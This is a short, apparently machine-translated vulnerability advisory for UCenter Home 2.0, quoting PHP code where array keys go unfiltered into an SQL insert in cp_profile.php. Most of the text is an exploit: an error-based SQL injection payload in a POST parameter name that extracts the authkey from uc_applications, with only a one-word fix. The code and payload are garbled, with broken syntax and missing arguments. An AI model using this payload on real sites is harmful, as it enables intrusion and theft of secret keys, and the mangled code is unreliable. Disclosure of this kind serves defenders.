UCenter Home 2.0 SQL injection and repair

Release date: 2011-01.23
Author: alibaba

Affected Version: UCenter Home 2.0
Official Website:Http://www.discuz.net

Vulnerability Type: SQL Injection
Vulnerability Description: uc_home 2.0 only filters parameter values in the magic_quote_gpc off environment. If the parameter name is ignored, injection is generated.
 

Code Analysis:

Function_common.php // SQL ADDSLASHES function saddslashes ($ string) {if (is_array ($ string) {foreach ($ string as $ key => $ val) {$ string [$ key] = saddslashes ($ val); // only filter parameter values} else {$ string = addslashes ($ string);} return $ string ;}
Cp_profile.php: about 56 rows

// Privacy $ inserts = array (); foreach ($ _ POST [friend] as $ key => $ value) {value = intval ($ value ); $ inserts [] = "(base, $ key, $ space [uid], $ value)"; // $ key not filtered} if ($ inserts) {$ _ SGLOBAL [db]-> query ("delete from ". tname (spaceinfo ). "WHERE uid = $ space [uid] AND type = base"); $ _ SGLOBAL [db]-> query ("insert ". tname (spaceinfo ). "(type, subtype, uid, friend) VALUES ". implode (, $ inserts); // The injection vulnerability appears here}
Exploit:

Requirement: magic_quote_gpc off
URL: cp. php? Ac = profile & op = base

Create a POST when saving the file with the parameter name:
Friend [a, (select 1 from (select count (*), concat (Select concat (substring (authkey,) FROM uc_applications limit), floor (rand (0) * 2) x from information_schema.tables group by x) a), 1) #]
Parameter Value: Random

Here I use Firefox's tamper to add POST in real time
 

 
Obtain the authkey of uchome.
 

 

Fix: Filter